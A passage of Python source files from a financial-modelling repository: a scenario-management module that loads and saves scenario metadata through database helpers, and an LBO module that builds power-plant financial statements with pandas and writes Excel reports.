| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,737 | changliukean/KEAN3 | refs/heads/master | /scenario_control/Scenario.py | from database import dbScenarioMaster
from utility import dateUtils
import pandas as pd
from datetime import datetime, date
import sys
class Scenario:
def __init__(self, module, table, portfolio, scenario, version, comment=''):
self.module = module
self.table = table
self.portfolio = portfolio
self.scenario = scenario
self.version = version
self.comment = ''
def print_scenario(self):
print ("---------------------------")
print ("Scenario object:")
print ("module:", self.module)
print ("table:", self.table)
print ("portfolio: ", self.portfolio)
print ("scenario:", self.scenario)
print ("version:", self.version)
print ("comment:", self.comment)
def __str__(self):
console_text = ''
console_text += ("---------------------------")
console_text += ("Scenario object:\n")
console_text += ("module:" + self.module + "\n")
console_text += ("table:" + self.table + "\n")
console_text += ("portfolio: " + self.portfolio + "\n")
console_text += ("scenario: " + self.scenario + "\n")
console_text += ("version: " + self.version + "\n")
console_text += ("comment: " + self.comment + "\n")
# sys.stdout.write(console_text) # print to the shell
return console_text
class ScenarioMaster:
def __init__(self,
outputScenario,
startYear=1900,
numberOfYears=-1,
forecastStartMonth=date(1900,1,1),
valuationDate=date(1900,1,1),
inputScenarios=[],
actualMonths=[],
forecastMonths=[],
inputScenarioMasters=[]):
# a Scenario OBJECT for output, this is a MUST HAVE parameter for initiating a ScenarioMater instance
self.outputScenario = outputScenario
# call a db getter to fill the date time information
db_start_year, db_number_of_years, db_forecast_start_month, db_valuation_date = self.load_scenario_datetime_fromdb()
# the first year of the scenario
self.startYear = startYear if startYear != 1900 else db_start_year
# the month that the forecast starts
self.forecastStartMonth = forecastStartMonth if forecastStartMonth != date(1900,1,1) else db_forecast_start_month
# total number of years
self.numberOfYears = numberOfYears if numberOfYears != -1 else db_number_of_years
# valuation date (if needed)
self.valuationDate = valuationDate if valuationDate != date(1900,1,1) else db_valuation_date
# list of months for actual period
self.actualMonths = actualMonths if actualMonths != [] else self.build_actuals_period()
# list of months for forecast period
self.forecastMonths = forecastMonths if forecastMonths != [] else self.build_forecast_period()
# a list of Scenarios OBJECTS for input
self.inputScenarios = inputScenarios
# a list of ScenarioMaster OBJECTS for input
self.inputScenarioMasters = inputScenarioMasters
def load_sm_fromdb(self):
raw_scenario_master_df = dbScenarioMaster.get_scenario_master(self.outputScenario.portfolio, self.outputScenario.scenario, self.outputScenario.version, self.outputScenario.module, self.outputScenario.table)
for index, row in raw_scenario_master_df.iterrows():
scenario_level = row['scenario_level']
if scenario_level == 'scenario':
scenario = Scenario(row['input_module'], row['input_table'], row['portfolio'], row['input_scenario'], row['input_version'], row['comment'])
self.inputScenarios.append(scenario)
if scenario_level == 'scenario_master':
scenario = Scenario(row['input_module'], row['input_table'], row['portfolio'], row['input_scenario'], row['input_version'], row['comment'])
scenario_master = ScenarioMaster(scenario)
scenario_master.load_sm_fromdb()
self.inputScenarioMasters.append(scenario_master)
def load_scenario_datetime_fromdb(self):
raw_scenario_master_datetime_df = dbScenarioMaster.get_scenario_master_datetime(self.outputScenario.portfolio, self.outputScenario.scenario, self.outputScenario.version, self.outputScenario.module)
# raw_scenario_master_datetime_df.to_csv("raw_scenario_master_datetime_df.csv")
if raw_scenario_master_datetime_df is not None and len(raw_scenario_master_datetime_df) > 0:
start_year = raw_scenario_master_datetime_df.iloc[0]['start_year']
number_of_years = raw_scenario_master_datetime_df.iloc[0]['number_of_years']
forecast_start_month = datetime.strptime(str(raw_scenario_master_datetime_df.iloc[0]['forecast_start_month']), "%Y-%m-%d").date()
valuation_date = datetime.strptime(str(raw_scenario_master_datetime_df.iloc[0]['valuation_date']), "%Y-%m-%d").date()
return start_year, number_of_years, forecast_start_month, valuation_date
else:
return 1900, -1, date(1900,1,1), date(1900,1,1)
def build_actuals_period(self):
actuals_end_month = dateUtils.get_one_month_ago(self.forecastStartMonth)
actuals_begin_month = date(self.startYear, 1, 31)
actual_months = dateUtils.get_month_list(actuals_begin_month, actuals_end_month)
return actual_months
def build_forecast_period(self):
forecast_end_month = date(self.startYear + self.numberOfYears - 1, 12,31)
forecast_months = dateUtils.get_month_list(self.forecastStartMonth, forecast_end_month)
return forecast_months
def print_scenario_master(self):
print ("====================================")
print ("Scenario Master object: ")
print ("start year:", self.startYear)
print ("forecast start month:", self.forecastStartMonth)
print ("number of years:", self.numberOfYears)
print ("valuation date:", self.valuationDate)
print ("actual month list:", self.actualMonths)
print ("forecast month list:", self.forecastMonths)
print ("----------------- output scenario: ")
self.outputScenario.print_scenario()
print ("input scenarios: ")
for scenario in self.inputScenarios:
print (scenario)
print ("----------------- input scenario masters:")
for scenario_master in self.inputScenarioMasters:
scenario_master.print_scenario_master()
def __str__(self):
console_text = ''
console_text += ("====================================\n")
console_text += ("Scenario Master object: \n")
console_text += ("start year:" + str(self.startYear) + "\n")
console_text += ("forecast start month:" + str(self.forecastStartMonth) + "\n")
console_text += ("number of years:" + str(self.numberOfYears) + "\n")
console_text += ("valuation date:" + str(self.valuationDate) + "\n")
console_text += ("actual month list:" + ",".join([str(item) for item in self.actualMonths]) + "\n")
console_text += ("forecast month list:" + ",".join([str(item) for item in self.forecastMonths]) + "\n")
console_text += ("----------------- output scenario: \n")
console_text += str(self.outputScenario)
console_text += ("input scenarios: \n")
for scenario in self.inputScenarios:
# scenario.print_scenario()
console_text += str(scenario)
console_text += ("----------------- input scenario masters:\n")
for scenario_master in self.inputScenarioMasters:
console_text += str(scenario_master.outputScenario)
return console_text
def save(self, force_overwrite=True):
# step 1 check if scenario_master has it
existing_scenario_master_df = dbScenarioMaster.get_scenario_master(self.outputScenario.portfolio, self.outputScenario.scenario, self.outputScenario.version, self.outputScenario.module, self.outputScenario.table)
""" portfolio, scenario, version, module """
existing_scenario_datetime_df = dbScenarioMaster.get_scenario_master_datetime(self.outputScenario.portfolio, self.outputScenario.scenario, self.outputScenario.version, self.outputScenario.module)
log_code = "000000"
# step 2, remove existing record if force_overwrite
if (len(existing_scenario_master_df) > 0 or len(existing_scenario_datetime_df) > 0) and force_overwrite:
dbScenarioMaster.delete_scenario_master(self.outputScenario.portfolio, self.outputScenario.scenario, self.outputScenario.version, self.outputScenario.module, self.outputScenario.table)
dbScenarioMaster.delete_scenario_datetime(self.outputScenario.portfolio, self.outputScenario.scenario, self.outputScenario.version, self.outputScenario.module)
log_code = "010003"
# step 3, if not force_overwrite, return and signal it
if (len(existing_scenario_master_df)) > 0 and (not force_overwrite):
log_code = "010002"
return log_code
# step 4, insert new records
# step 4.1, reorganize and insert scenario master time info
dbScenarioMaster.insert_scenario_datetime(self.outputScenario.module,
self.outputScenario.portfolio,
self.outputScenario.scenario,
self.outputScenario.version,
self.startYear,
self.numberOfYears,
self.forecastStartMonth,
self.valuationDate)
# step 4.2, reorganize and insert scenario master input info
ready_to_kean_sm_list = []
for input_scenario in self.inputScenarios:
ready_to_kean_sm_row = []
ready_to_kean_sm_row.append(self.outputScenario.portfolio)
ready_to_kean_sm_row.append(self.outputScenario.module)
ready_to_kean_sm_row.append(self.outputScenario.table)
ready_to_kean_sm_row.append(self.outputScenario.scenario)
ready_to_kean_sm_row.append(self.outputScenario.version)
ready_to_kean_sm_row.append(input_scenario.module)
ready_to_kean_sm_row.append(input_scenario.table)
ready_to_kean_sm_row.append(input_scenario.scenario)
ready_to_kean_sm_row.append(input_scenario.version)
ready_to_kean_sm_row.append("scenario")
ready_to_kean_sm_row.append(input_scenario.comment)
ready_to_kean_sm_list.append(ready_to_kean_sm_row)
for input_scenario_master in self.inputScenarioMasters:
ready_to_kean_sm_row = []
ready_to_kean_sm_row.append(self.outputScenario.portfolio)
ready_to_kean_sm_row.append(self.outputScenario.module)
ready_to_kean_sm_row.append(self.outputScenario.table)
ready_to_kean_sm_row.append(self.outputScenario.scenario)
ready_to_kean_sm_row.append(self.outputScenario.version)
ready_to_kean_sm_row.append(input_scenario_master.outputScenario.module)
ready_to_kean_sm_row.append(input_scenario_master.outputScenario.table)
ready_to_kean_sm_row.append(input_scenario_master.outputScenario.scenario)
ready_to_kean_sm_row.append(input_scenario_master.outputScenario.version)
ready_to_kean_sm_row.append("scenario_master")
ready_to_kean_sm_row.append(input_scenario_master.outputScenario.comment)
ready_to_kean_sm_list.append(ready_to_kean_sm_row)
ready_to_kean_sm_df = pd.DataFrame(data=ready_to_kean_sm_list, columns=['portfolio','output_module','output_table','output_scenario','output_version','input_module','input_table','input_scenario','input_version','scenario_level','comment'])
dbScenarioMaster.insert_scenario_master(ready_to_kean_sm_df)
return log_code
def remove(self):
# to be implemented
return
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,738 | changliukean/KEAN3 | refs/heads/master | /lbo/lbo.py | import pandas as pd
import numpy as np
from openpyxl import Workbook
import openpyxl as opx
from openpyxl.utils.dataframe import dataframe_to_rows
from utility.dateUtils import get_month_list
from database.dbPrices import get_historical_lmp
from dateutil.relativedelta import relativedelta
from datetime import date, datetime
import sys
LBO_FSLI_COLOR = {'Delivered Fuel Expense':-1,'Variable O&M Expense':-1,'Net Emissions Expense':-1}
LBO_SUM_FSLIS = ['Energy Revenue','Delivered Fuel Expense','Variable O&M Expense',
'Net Emissions Expense','Gross Energy Margin','Hedges',
'Net Energy Margin','Fixed Fuel Transport','Capacity Revenue',
'Ancillary Revenue','Other Revenue','Gross Margin',
'FOM','Taxes','Insurance','Fixed Costs',
'EBITDA','Capex','EBITDA less Capex',
'Generation', 'Generation - On Peak', 'Generation - Off Peak',
'Hours - On Peak', 'Hours - Off Peak']
def convert_date(datetimeobj):
if isinstance(datetimeobj, date):
return datetimeobj
if isinstance(datetimeobj, datetime):
return datetimeobj.date()
print (datetimeobj)
sys.exit()
def build_lbo_financials(powerplant_df, portfolio, scenario, version, dispatch_df, lbo_assumptions_df):
lbo_financials_df = pd.DataFrame()
dispatch_financials_fsli_list = ['Generation - On Peak',
'Generation - Off Peak',
'Generation',
'ICAP',
'Capacity Factor',
'Capacity Factor - On Peak',
'Capacity Factor - Off Peak',
'Realized Power Price - Off Peak',
'Realized Power Price - On Peak',
'Realized Fuel Price - Off Peak',
'Realized Fuel Price - On Peak',
'Realized Spread - ATC',
'Realized Spread - Off Peak',
'Realized Spread - On Peak',
'Energy Revenue',
'Delivered Fuel Expense',
'Variable O&M Expense',
'Net Emissions Expense',
'on_hours',
'off_hours']
lbo_dispatch_df = dispatch_df.loc[dispatch_df.fsli.isin(dispatch_financials_fsli_list)]
lbo_financials_df = lbo_dispatch_df
dispatch_plant_list = list(set(list(lbo_financials_df.entity)))
""" company, scenario, version, entity, fsli, period, value """
for fsli in ['Capacity Revenue','FOM','Taxes','Insurance','Fixed Costs','Hedges','Fixed Fuel Transport','Other Revenue','Ancillary Revenue','Capex']:
for index, row in powerplant_df.iterrows():
entity = row['name']
if fsli in ['ICAP']:
if entity not in dispatch_plant_list:
lbo_fsli_entity_assumptions_df = lbo_assumptions_df.loc[(lbo_assumptions_df.entity == entity) & (lbo_assumptions_df.fsli == fsli)]
unit = lbo_fsli_entity_assumptions_df.iloc[0]['unit']
temp_fsli_df = pd.DataFrame()
if unit == '$':
temp_fsli_df = lbo_fsli_entity_assumptions_df[['entity', 'fsli', 'period', 'value']]
temp_fsli_df['company'] = portfolio
temp_fsli_df['scenario'] = scenario
temp_fsli_df['version'] = version
lbo_financials_df = lbo_financials_df.append(temp_fsli_df)
continue
lbo_fsli_entity_assumptions_df = lbo_assumptions_df.loc[(lbo_assumptions_df.entity == entity) & (lbo_assumptions_df.fsli == fsli)]
unit = lbo_fsli_entity_assumptions_df.iloc[0]['unit']
temp_fsli_df = pd.DataFrame()
if unit == '$':
temp_fsli_df = lbo_fsli_entity_assumptions_df[['entity', 'fsli', 'period', 'value']]
temp_fsli_df['company'] = portfolio
temp_fsli_df['scenario'] = scenario
temp_fsli_df['version'] = version
lbo_financials_df = lbo_financials_df.append(temp_fsli_df)
lbo_financials_df['scenario'] = scenario
lbo_financials_df['version'] = version
lbo_financials_df['period'] = lbo_financials_df.apply(lambda row: convert_date(row['period']), axis=1)
lbo_financials_df = lbo_financials_df[['company','scenario','version','entity','fsli','period','value']]
pivot_lbo_financials_df = pd.pivot_table(lbo_financials_df, index=['company','scenario','version','entity', 'period'], columns=['fsli'], values='value', aggfunc=np.sum)
# lbo_financials_df.to_csv("lbo_financials_df.csv")
pivot_lbo_financials_df = pivot_lbo_financials_df.reset_index()
pivot_lbo_financials_df.fillna(0.0, inplace=True)
pivot_lbo_financials_df['Gross Energy Margin'] = pivot_lbo_financials_df['Energy Revenue'] - pivot_lbo_financials_df['Delivered Fuel Expense'] - pivot_lbo_financials_df['Variable O&M Expense'] - pivot_lbo_financials_df['Net Emissions Expense']
pivot_lbo_financials_df['Net Energy Margin'] = pivot_lbo_financials_df['Gross Energy Margin'] + pivot_lbo_financials_df['Hedges']
pivot_lbo_financials_df['Gross Margin'] = pivot_lbo_financials_df['Net Energy Margin'] + \
pivot_lbo_financials_df['Fixed Fuel Transport'] + \
pivot_lbo_financials_df['Capacity Revenue'] + \
pivot_lbo_financials_df['Ancillary Revenue'] + \
pivot_lbo_financials_df['Other Revenue']
pivot_lbo_financials_df['EBITDA'] = pivot_lbo_financials_df['Gross Margin'] + \
pivot_lbo_financials_df['Fixed Costs']
pivot_lbo_financials_df['EBITDA less Capex'] = pivot_lbo_financials_df['EBITDA'] + \
pivot_lbo_financials_df['Capex']
pivot_lbo_financials_df['Realized Power Price'] = pivot_lbo_financials_df['Energy Revenue'] / \
pivot_lbo_financials_df['Generation']
pivot_lbo_financials_df.rename(columns={'on_hours':'Hours - On Peak', 'off_hours':'Hours - Off Peak'}, inplace=True)
pivot_lbo_financials_df = pivot_lbo_financials_df.reset_index()
pivot_lbo_financials_df = pivot_lbo_financials_df[[item for item in pivot_lbo_financials_df.columns if item != 'index']]
retirement_date_df = powerplant_df[['name','retirement_date']]
pivot_lbo_financials_df = pd.merge(pivot_lbo_financials_df, retirement_date_df, left_on=['entity'], right_on=['name'], how='left')
""" if a plant is retired, just drop that row """
for index, row in pivot_lbo_financials_df.iterrows():
if row['period'] > row['retirement_date']:
pivot_lbo_financials_df.drop(index, inplace=True)
# pivot_lbo_financials_df.to_csv("pivot_lbo_financials_df.csv")
melted_pivot_lbo_financials_df = pd.melt(pivot_lbo_financials_df, id_vars=['company','scenario','version','entity','period'],
value_vars=[item for item in list(pivot_lbo_financials_df.columns) if item not in ['company','scenario','version','entity','period']],
var_name='fsli',
value_name='value')
melted_pivot_lbo_financials_df.rename(columns={'company':'portfolio'}, inplace=True)
# melted_pivot_lbo_financials_df.to_csv("melted_pivot_lbo_financials_df.csv")
return melted_pivot_lbo_financials_df
def write_lbo_financials_report_monthly(dest_file_path, lbo_financials_df, portfolio):
wb = Workbook()
entity_list = list(sorted(list(set(list(lbo_financials_df['entity'])))))
# step 1, apply lbo color for sinage
pivot_lbo_financials_df = pd.pivot_table(lbo_financials_df, index=['portfolio','scenario','version','entity','period'], columns=['fsli'], values='value', aggfunc=np.sum)
for fsli in LBO_FSLI_COLOR:
pivot_lbo_financials_df[fsli] = pivot_lbo_financials_df[fsli] * LBO_FSLI_COLOR[fsli]
pivot_lbo_financials_df = pivot_lbo_financials_df.reset_index()
lbo_financials_df = pd.melt(pivot_lbo_financials_df, id_vars=['portfolio','scenario','version','entity','period'],
value_vars=[item for item in list(pivot_lbo_financials_df.columns) if item not in ['portfolio','scenario','version','entity','period']],
var_name='fsli',
value_name='value')
lbo_financials_df = lbo_financials_df.reset_index()
pnl_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(['Energy Revenue',
'Delivered Fuel Expense',
'Variable O&M Expense',
'Net Emissions Expense',
'Gross Energy Margin',
'Hedges',
'Net Energy Margin',
'Fixed Fuel Transport',
'Capacity Revenue',
'Ancillary Revenue',
'Other Revenue',
'Gross Margin',
'FOM',
'Taxes',
'Insurance',
'Fixed Costs',
'EBITDA',
'Capex',
'EBITDA less Capex'])]
summary_df = pd.pivot_table(pnl_lbo_financials_df, index=['portfolio','scenario','version','fsli'], columns=['period'], values='value', aggfunc=np.sum)
summary_df = summary_df.reset_index()
summary_df = summary_df[[column for column in summary_df.columns if column not in ['portfolio','scenario','version']]]
summary_df.rename(columns={'fsli': portfolio}, inplace=True)
summary_df = summary_df.set_index(portfolio)
summary_df = summary_df.reindex(['Energy Revenue','Delivered Fuel Expense','Variable O&M Expense',
'Net Emissions Expense','Gross Energy Margin','Hedges',
'Net Energy Margin','Fixed Fuel Transport','Capacity Revenue',
'Ancillary Revenue','Other Revenue','Gross Margin',
'FOM','Taxes','Insurance','Fixed Costs',
'EBITDA','Capex','EBITDA less Capex'])
capacity_row_group_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(['ICAP', 'Generation', 'Generation - On Peak', 'Generation - Off Peak', 'Hours - On Peak', 'Hours - Off Peak'])]
capacity_row_group_df = pd.pivot_table(capacity_row_group_df, index=['portfolio','scenario','version', 'period'], columns=['fsli'], values='value', aggfunc=np.sum)
capacity_row_group_df = capacity_row_group_df.reset_index()
capacity_row_group_df['Capacity Factor'] = capacity_row_group_df.apply(lambda row: row['Generation'] / (row['ICAP'] * 24 * row['period'].day), axis=1)
capacity_row_group_df['Capacity Factor - On Peak'] = capacity_row_group_df['Generation - On Peak'] / (capacity_row_group_df['ICAP'] * capacity_row_group_df['Hours - On Peak'] / len(entity_list))
capacity_row_group_df['Capacity Factor - Off Peak'] = capacity_row_group_df['Generation - Off Peak'] / (capacity_row_group_df['ICAP'] * capacity_row_group_df['Hours - Off Peak'] / len(entity_list))
capacity_row_group_df['Hours - On Peak'] = capacity_row_group_df['Hours - On Peak'] / len(entity_list)
capacity_row_group_df['Hours - Off Peak'] = capacity_row_group_df['Hours - Off Peak'] / len(entity_list)
# capacity_row_group_df.rename(columns={'on_hours':'Hours - On Peak','off_hours':"Hours - Off Peak"}, inplace=True)
capacity_row_group_df = pd.melt(capacity_row_group_df, id_vars=['portfolio','scenario','version','period'],
value_vars=[item for item in list(capacity_row_group_df.columns) if item not in ['portfolio','scenario','version','period']],
var_name='fsli',
value_name='value')
capacity_row_group_df = pd.pivot_table(capacity_row_group_df, index=['portfolio','scenario','version','fsli'], columns=['period'], values='value', aggfunc=np.sum )
capacity_row_group_df = capacity_row_group_df.reset_index()
capacity_row_group_df = capacity_row_group_df[[item for item in capacity_row_group_df.columns if item not in ['portfolio', 'scenario', 'version']]]
capacity_row_group_df.rename(columns={'fsli':portfolio}, inplace=True)
capacity_row_group_df = capacity_row_group_df.set_index(portfolio)
capacity_row_group_df = capacity_row_group_df.reindex(['ICAP', 'Generation', 'Generation - On Peak', 'Generation - Off Peak', 'Hours - On Peak', 'Hours - Off Peak'])
summary_df = summary_df.append(capacity_row_group_df)
summary_df.rename(columns={'fsli': portfolio}, inplace=True)
summary_df = summary_df.reset_index()
summary_tab = wb.copy_worksheet(wb.active)
summary_tab.title = 'Summary'
for r in dataframe_to_rows(summary_df, index=False, header=True):
summary_tab.append(r)
# annual consolidated view tab
annual_consolidated_tab = wb.copy_worksheet(wb.active)
sum_fslis_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(LBO_SUM_FSLIS)]
sum_fslis_lbo_financials_df.loc[:,'year'] = pd.DatetimeIndex(sum_fslis_lbo_financials_df['period']).year
grouped_sum_fslis_lbo_financials_df = sum_fslis_lbo_financials_df.groupby(['portfolio','scenario','version','entity','fsli','year']).sum()
grouped_sum_fslis_lbo_financials_df = grouped_sum_fslis_lbo_financials_df.reset_index()
average_fslis = ['ICAP']
average_fslis_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(average_fslis)]
average_fslis_lbo_financials_df.loc[:,'year'] = pd.DatetimeIndex(average_fslis_lbo_financials_df['period']).year
grouped_average_fslis_lbo_financials_df = average_fslis_lbo_financials_df.groupby(['portfolio','scenario','version','entity','fsli','year']).mean()
grouped_average_fslis_lbo_financials_df = grouped_average_fslis_lbo_financials_df.reset_index()
annual_lbo_financials_df = grouped_sum_fslis_lbo_financials_df.append(grouped_average_fslis_lbo_financials_df)
# annual_lbo_financials_df.to_csv("annual_lbo_financials_df.csv")
pivot_annual_lbo_financials_df = pd.pivot_table(annual_lbo_financials_df, index=['portfolio','scenario','version','entity','year'], columns=['fsli'], values='value', aggfunc=np.sum)
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reset_index()
pivot_annual_lbo_financials_df['Capacity Factor'] = pivot_annual_lbo_financials_df['Generation'] / ( pivot_annual_lbo_financials_df['ICAP'] * ( pivot_annual_lbo_financials_df['Hours - On Peak'] + pivot_annual_lbo_financials_df['Hours - Off Peak'] ))
pivot_annual_lbo_financials_df['Capacity Factor - On Peak'] = pivot_annual_lbo_financials_df['Generation - On Peak'] / ( pivot_annual_lbo_financials_df['ICAP'] * ( pivot_annual_lbo_financials_df['Hours - On Peak'] ))
pivot_annual_lbo_financials_df['Capacity Factor - Off Peak'] = pivot_annual_lbo_financials_df['Generation - Off Peak'] / ( pivot_annual_lbo_financials_df['ICAP'] * ( pivot_annual_lbo_financials_df['Hours - Off Peak'] ))
annual_lbo_financials_df = pd.melt(pivot_annual_lbo_financials_df,
id_vars=['portfolio','scenario','version','entity','year'],
value_vars=[item for item in list(pivot_annual_lbo_financials_df.columns) if item not in ['portfolio','scenario','version','entity','year']],
var_name='fsli',
value_name='value')
grouped_sum_fslis_lbo_financials_df = annual_lbo_financials_df
annual_lbo_financials_view_df = pd.DataFrame()
for entity in entity_list:
entity_annual_financials_df = grouped_sum_fslis_lbo_financials_df.loc[grouped_sum_fslis_lbo_financials_df.entity == entity]
pivot_annual_lbo_financials_df = pd.pivot_table(entity_annual_financials_df, index=['portfolio','scenario','version','entity','fsli'], columns=['year'], values='value', aggfunc=np.sum)
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reset_index()
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df[[item for item in pivot_annual_lbo_financials_df.columns if item not in ['portfolio','scenario','version','entity']]]
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.set_index('fsli')
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reindex(LBO_SUM_FSLIS + ['ICAP','Capacity Factor','Capacity Factor - On Peak','Capacity Factor - Off Peak'])
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reset_index()
pivot_annual_lbo_financials_df['entity'] = entity
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df[['entity'] + [item for item in pivot_annual_lbo_financials_df.columns if item not in ['entity']]]
annual_lbo_financials_view_df = annual_lbo_financials_view_df.append(pivot_annual_lbo_financials_df)
for r in dataframe_to_rows(annual_lbo_financials_view_df, index=False, header=True):
annual_consolidated_tab.append(r)
annual_consolidated_tab.title = 'AnnualByPlant'
# annual view for fsli per portfolio
annual_fsli_consolidated_tab = wb.copy_worksheet(wb.active)
sum_fslis_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(LBO_SUM_FSLIS)]
sum_fslis_lbo_financials_df.loc[:,'year'] = pd.DatetimeIndex(sum_fslis_lbo_financials_df['period']).year
grouped_sum_fslis_lbo_financials_df = sum_fslis_lbo_financials_df.groupby(['portfolio','scenario','version','fsli','year']).sum()
grouped_sum_fslis_lbo_financials_df = grouped_sum_fslis_lbo_financials_df.reset_index()
grouped_sum_fslis_lbo_financials_df = grouped_sum_fslis_lbo_financials_df[['fsli','year','value']]
annual_lbo_financials_view_df = pd.pivot_table(grouped_sum_fslis_lbo_financials_df, index=['fsli'], columns=['year'], values='value', aggfunc=np.sum)
annual_lbo_financials_view_df = annual_lbo_financials_view_df.reset_index()
for r in dataframe_to_rows(annual_lbo_financials_view_df, index=False, header=True):
annual_fsli_consolidated_tab.append(r)
annual_fsli_consolidated_tab.title = 'AnnualFSLI'
# monthly view for individual plant
for entity in entity_list:
entity_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.entity == entity]
entity_tab = wb.copy_worksheet(wb.active)
entity_tab.title = entity.replace("/"," ")
entity_df = pd.pivot_table(entity_lbo_financials_df, index=['portfolio','scenario','version','fsli','entity'], columns=['period'], values='value', aggfunc=np.sum)
entity_df = entity_df.reset_index()
entity_df = entity_df[[column for column in entity_df.columns if column not in ['portfolio','scenario','version','entity']]]
entity_df.rename(columns={'fsli': entity}, inplace=True)
entity_df = entity_df.set_index(entity)
entity_df = entity_df.reindex(['Energy Revenue','Delivered Fuel Expense','Variable O&M Expense',
'Net Emissions Expense','Gross Energy Margin','Hedges',
'Net Energy Margin','Fixed Fuel Transport','Capacity Revenue',
'Ancillary Revenue','Other Revenue','Gross Margin',
'FOM','Taxes','Insurance','Fixed Costs',
'EBITDA','Capex','EBITDA less Capex',
'ICAP', 'Generation', 'Generation - On Peak', 'Generation - Off Peak',
'Capacity Factor', 'Capacity Factor - On Peak','Capacity Factor - Off Peak',
'Realized Power Price - On Peak', 'Realized Power Price - Off Peak',
'Realized Fuel Price - On Peak', 'Realized Fuel Price - Off Peak',
'Realized Spread - ATC','Realized Spread - Off Peak','Realized Spread - On Peak',
'Hours - On Peak', 'Hours - Off Peak'])
entity_df = entity_df.reset_index()
for r in dataframe_to_rows(entity_df, index=False, header=True):
entity_tab.append(r)
wb.remove_sheet(wb.active)
wb.save(dest_file_path + r"\\" + portfolio + "_" + lbo_financials_df['scenario'].iloc[0].replace(portfolio+" ", '') + "_" + lbo_financials_df['version'].iloc[0] + "_lbo_financials.xlsx")
def convert_annual_lbo_financials(lbo_financials_df):
# step 1, apply lbo color for sinage
pivot_lbo_financials_df = pd.pivot_table(lbo_financials_df, index=['portfolio','scenario','version','entity','period'], columns=['fsli'], values='value', aggfunc=np.sum)
for fsli in LBO_FSLI_COLOR:
pivot_lbo_financials_df[fsli] = pivot_lbo_financials_df[fsli] * LBO_FSLI_COLOR[fsli]
pivot_lbo_financials_df = pivot_lbo_financials_df.reset_index()
lbo_financials_df = pd.melt(pivot_lbo_financials_df, id_vars=['portfolio','scenario','version','entity','period'],
value_vars=[item for item in list(pivot_lbo_financials_df.columns) if item not in ['portfolio','scenario','version','entity','period']],
var_name='fsli',
value_name='value')
lbo_financials_df = lbo_financials_df.reset_index()
entity_list = list(sorted(list(set(list(lbo_financials_df['entity'])))))
sum_fslis_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(LBO_SUM_FSLIS)]
